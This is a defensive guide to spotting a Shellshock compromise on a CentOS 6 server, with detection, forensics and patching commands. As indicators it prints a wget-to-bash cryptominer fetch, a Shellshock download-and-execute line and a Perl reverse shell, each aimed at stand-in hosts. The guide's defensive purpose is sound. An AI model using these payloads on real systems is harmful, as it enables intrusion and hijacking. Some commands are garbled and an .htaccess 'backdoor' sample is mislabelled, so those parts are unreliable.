To determine if your CentOS 6 server has been compromised via Shellshock, check these indicators:
# Check for suspicious processes
ps aux | grep -E '(wget|curl|bash|sh|\.\/)' | grep -v grep
# Examine command history of all users
for user in $(cut -f1 -d: /etc/passwd); do echo "==== $user ===="; sudo -u $user -i -- sh -c 'echo $HOME && cat $HOME/.bash_history'; done
# Look for unexpected cron jobs
crontab -l
ls -la /etc/cron*
Attackers often target these locations:
# Common malware locations
/tmp/
/var/tmp/
/dev/shm/
/usr/bin/
/usr/sbin/
/home/*/public_html/
/var/www/
Malicious files often have these characteristics:
# Find files with suspicious permissions
find / -type f $-perm -4000 -o -perm -2000$ -exec ls -la {} \;
# Check for recently modified binaries
find /bin /usr/bin /sbin /usr/sbin -type f -mtime -7 -exec ls -la {} \;
# Look for hidden files in web directories
find /var/www/ -name ".*" -type f -exec ls -la {} \;
Watch for these common malicious code patterns:
# Backdoor example (often found in .htaccess)
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^.*(wget|curl).* [NC]
RewriteRule .* - [F,L]
</IfModule>
# Cryptominer payload example
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin
wget -q -O - http://malicious.site/xmrig | bash > /dev/null 2>&1 &
If you find evidence of compromise:
# Isolate the server
iptables -A INPUT -j DROP
# Capture forensic evidence
mkdir /root/forensics
lsof -nPi > /root/forensics/open_ports.txt
netstat -tulnp > /root/forensics/netstat.txt
ps aux > /root/forensics/processes.txt
# Update and patch immediately
yum clean all
yum update bash
Here are key indicators that your CentOS 6 server with LEMP stack might have been exploited through Shellshock:
# Check for unexpected processes
ps aux | grep -E 'wget|curl|bash|sh|\.sh'
# Look for unusual network connections
netstat -tulnp
lsof -i
# Examine cron jobs for suspicious entries
crontab -l
ls -la /etc/cron*
Focus your search on these directories where attackers commonly place backdoors:
/tmp/
/var/tmp/
/dev/shm/
/etc/cron.hourly/
/etc/cron.daily/
/root/.ssh/
/home/*/.ssh/
/usr/lib/cgi-bin/
/var/www/*/cgi-bin/
/usr/local/bin/
Typical characteristics of Shellshock-related malware:
- Files with random alphanumeric names (e.g., x84h2k9, tmp.2387)
- Scripts containing base64-encoded blobs
- Files with recent timestamps during suspicious periods
- World-writable scripts in web-accessible directories
Use these commands to detect potential compromises:
# Find recently modified files (last 3 days)
find / -type f -mtime -3 -ls | grep -vE '\/proc\/|\/sys\/'
# Locate scripts with suspicious permissions
find / -type f -perm -o=w -name "*.sh" -o -name "*.pl" -o -name "*.py"
# Search for files containing common malicious patterns
grep -rE 'wget.*http:|curl.*http:|bash -i' / 2>/dev/null
Here's what to look for in suspicious files:
# Typical backdoor example
() { :;}; /bin/bash -c 'wget http://malicious.site/x.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x'
# IRC bot connection attempt
() { :;}; /usr/bin/perl -e 'use Socket;$i="attacker.ip";$p=6667;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
If you find evidence of compromise:
- Immediately isolate the server from the network
- Preserve logs (/var/log/) for forensic analysis
- Reinstall the OS rather than trying to clean the system
- Audit all SSH keys and passwords
- Upgrade bash to latest patched version